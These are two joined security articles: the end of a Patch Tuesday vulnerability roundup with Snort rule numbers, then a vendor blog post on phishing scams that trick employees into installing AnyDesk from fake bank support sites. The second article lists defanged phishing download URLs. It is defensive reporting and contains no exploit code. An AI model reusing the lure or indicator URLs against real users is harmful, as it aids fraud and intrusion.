Although considered of moderate risk, one of the vulnerabilities is being actively exploited in the wild — CVE-2024-21351, a security feature bypass vulnerability in Windows SmartScreen. “Smart screen” protects users from malicious websites and files downloaded from the internet. Exploiting this vulnerability may allow a user to be tricked into downloading and executing a file from the internet without the traditional SmartScreen protections. There were no zero-day vulnerabilities disclosed in last month’s Patch Tuesday.

Of the three critical vulnerabilities, one (CVE-2024-20684) could allow an attacker that controls a Hyper-V guest to cause a denial-of-service attack on the host and, as a consequence, to all other guests of the same host.

CVE-2024-21357 is another critical remote code execution vulnerability in a multicast network protocol called Windows Pragmatic General Multicast. The vulnerability could, in theory, allow an attacker on the same network to execute code on other systems on that network. Microsoft considers the vulnerability exploitation complex, however, the company does list it as “more likely” to be exploited.

The third critical vulnerability (CVE-2024-21380) is an information disclosure vulnerability in Microsoft Dynamics Business Central/NAV. According to Microsoft, the exploitation of this attack requires user interaction, and the attacker must first win a race condition. Therefore, it’s considered to be a more complex attack and “less likely” to be exploited.

Cisco Talos would also like to highlight CVE-2024-21378, a remote code execution vulnerability in Microsoft Outlook. However, according to the advisory, this requires the attacker to be on the same network as the targeted machine and trick the victim into opening a specially crafted file or email.

CVE-2024-21379 is also a remote code execution vulnerability, this time in Microsoft Word. Exploiting this vulnerability requires an attacker to send to a victim a specially crafted Word document that, when opened, would allow remote code execution in the victim’s system.

The advisory contains 26 other remote code execution vulnerabilities that are considered “less likely” to be exploited. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63000 - 63001, 63004, 63005, 62992 - 62994, 62998 and 62999. There are also Snort 3 rules 300822 - 300826.

First Microsoft Patch Tuesday zero-day of 2024 disclosed as part of group of 75 vulnerabilities

Threat actors are abusing commercial remote software like AnyDesk to phish users and defraud them.

Remote Monitoring & Management (RMM) software, including popular tools like AnyDesk, Atera, and Splashtop, are invaluable for IT administrators today, streamlining tasks and ensuring network integrity from afar. However, these same tools have caught the eye of cybercriminals, who exploit them to infiltrate company networks and pilfer sensitive data.

The modus operandi of these threat actors involves deceiving employees through sophisticated scams and deceptive online advertisements. Unsuspecting employees, misled by these tactics, may inadvertently invite these criminals into their systems. By convincing employees to download and run these seemingly benign RMM applications under the guise of fixing non-existent issues, these fraudsters gain unfettered access to the company’s network.

In this post, we explore a particular phishing scam targeting corporate users via the AnyDesk remote software and how ThreatDown can prevent the misuse of such programs by cybercriminals.

**Phishing site hosts remote software**

We believe victims are first targeted and then contacted via phishing emails or text messages (smishing) based on their position in the company.

Attackers could trick them by sending them to a typical phishing page or making them download malware, all of which are good options. However, they are instead playing the long game where they can interact with their victims.

Users are directed to newly registered websites that mimic their financial institution. In order to get support, they need to download remote desktop software disguised as a ‘live chat application’.

uk-barclaysliveteam\[.\]com/corp/AnyDesk.exe  
uk-barclaysliveteam\[.\]com/corp/anydesk.dmg

It’s interesting to note that the downloaded software is not malware. For example, in this instance they are using a legitimate (although outdated) AnyDesk executable which would not be detected as malicious by security products.

Running the program will show a code that you can give to the person trying to assist you. This can allow an attacker to gain control of the machine and perform actions that look like they came directly from the user.

This is one reason why certain banking sites try to can detect if a customer is currently running a remote program, before allowing them to login. However, not all banks have this feature and there are certain cases where threat actors can evade such detection.

There are a number of RMM tools on the market which scammers and criminals will leverage. Ironically, the more popular and simple ones also tend to be the most abused.

AnyDesk recently got in the news for a security breach that allowed the attackers to compromise their production systems. The vendor has since revoked its code signing certificates and is urging customers to update their software.

RMM vendors are aware of the illicit use of their software and regularly remind users about common safety tips. AnyDesk also partnered with fraud fighters such as ScammerPayback to shut down call centers.

Free with every ThreatDown Bundle, Application Block can easily protect organizations against the rising trend of legitimate RMM tools being exploited. Organizations can block RMM tools via Application Block by:

*   Navigating to the ‘Monitor’ section within their Nebula console.
*   Selecting ‘Application Block’
*   Enabling the ‘Block RMM’ toggle switch provided by ThreatDown or customizing the list to fit their specific needs.

Saving the configuration to immediately block these RMM tools network-wide.

Adopt a robust defense stance by blocking all unnecessary applications, and for those you must use, the EDR/MDR layers of our ThreatDown Bundles will provide an additional safety net in the event of an infection.

**Try ThreatDown bundles today**

For IT teams plagued by the triad of complex deployment, scattered tooling, and excessive alert noise, ThreatDown bundles emerge as a superior solution that caters to the needs of today’s security teams.

Discover the difference with ThreatDown Bundles and elevate your organization’s defense against cyber threats. Get in touch for a free trial and experience the benefits of a simplified, yet robust, security framework.

**Experience ThreatDown Bundles**

Tag

#mac